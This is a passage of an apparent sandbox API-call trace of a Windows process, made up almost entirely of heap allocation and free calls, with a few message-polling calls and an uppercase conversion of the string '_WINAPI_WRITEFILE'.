Flags=0x0, Size=0x10) returned 0x9bd888 [0182.389] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0182.389] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0182.389] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0182.389] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0182.389] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0182.389] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0182.390] FreeLibrary (hLibModule=0x75990000) returned 1 [0182.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0182.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0182.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0182.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0182.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0182.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0182.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0182.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0182.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0182.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0182.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0182.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0182.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0182.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0182.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0182.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0182.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0182.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0182.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0182.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0182.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0182.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0182.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0182.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0182.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0182.391] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0182.391] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0182.391] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0182.391] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0182.391] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0182.391] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0182.391] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0182.391] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0182.391] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0182.391] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0182.391] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0182.391] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0182.391] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0182.391] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0182.391] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0182.391] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.391] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0182.391] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0182.391] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0182.391] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0182.391] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0182.391] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0182.391] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0182.391] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0182.391] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0182.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0182.392] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0182.392] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d4c0 [0182.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0182.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0182.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0182.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0182.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0182.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0182.392] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.392] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0182.392] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0182.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0182.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0182.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0182.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0182.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0182.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0182.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0182.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0182.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0182.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0182.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0182.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0182.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0182.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0182.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0182.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0182.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0182.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0182.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0182.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0182.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0182.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0182.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0182.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0182.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0182.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0182.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0182.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0182.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0182.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0182.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0182.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0182.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0182.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0182.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0182.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0182.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0182.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0182.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0182.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0182.394] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0182.394] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0182.394] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0182.394] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0182.394] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0182.394] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fff00 | out: hHeap=0x8a0000) returned 1 [0182.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0182.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0182.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0182.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0182.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0182.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0182.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0182.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0182.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0182.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0182.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0182.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0182.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0182.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0182.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0182.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0182.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0182.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0182.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0182.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0182.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0182.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0182.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0182.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0182.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0182.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0182.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0182.396] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0182.396] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0182.396] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0182.396] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0182.396] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0182.396] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0182.396] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0182.396] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0182.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0182.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0182.396] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0182.396] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1ac0 [0182.396] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0182.396] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0182.396] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0182.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0182.396] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1a00 [0182.396] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0182.397] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0182.397] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0182.397] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0182.397] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0182.397] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0182.397] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc1c8 [0182.397] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0182.397] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0182.397] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0182.397] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0182.397] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0182.397] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc1c8 | out: hHeap=0x8a0000) returned 1 [0182.397] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0182.397] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0182.397] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0182.397] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0182.397] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b60 [0182.397] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0182.397] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0182.397] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0182.397] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1900 [0182.397] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0182.397] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba390 [0182.397] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0182.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0182.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0182.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0182.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0182.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0182.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0182.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0182.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0182.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0182.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0182.398] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0182.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0182.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0182.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0182.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0182.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0182.398] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0182.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0182.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0182.398] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0182.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0182.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0182.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0182.399] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0182.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0182.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0182.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0182.399] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0182.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0182.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0182.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0182.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0182.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0182.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0182.399] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0182.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0182.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0182.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0182.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0182.399] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0182.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0182.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0182.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0182.399] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0182.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0182.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0182.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0182.400] HeapFree 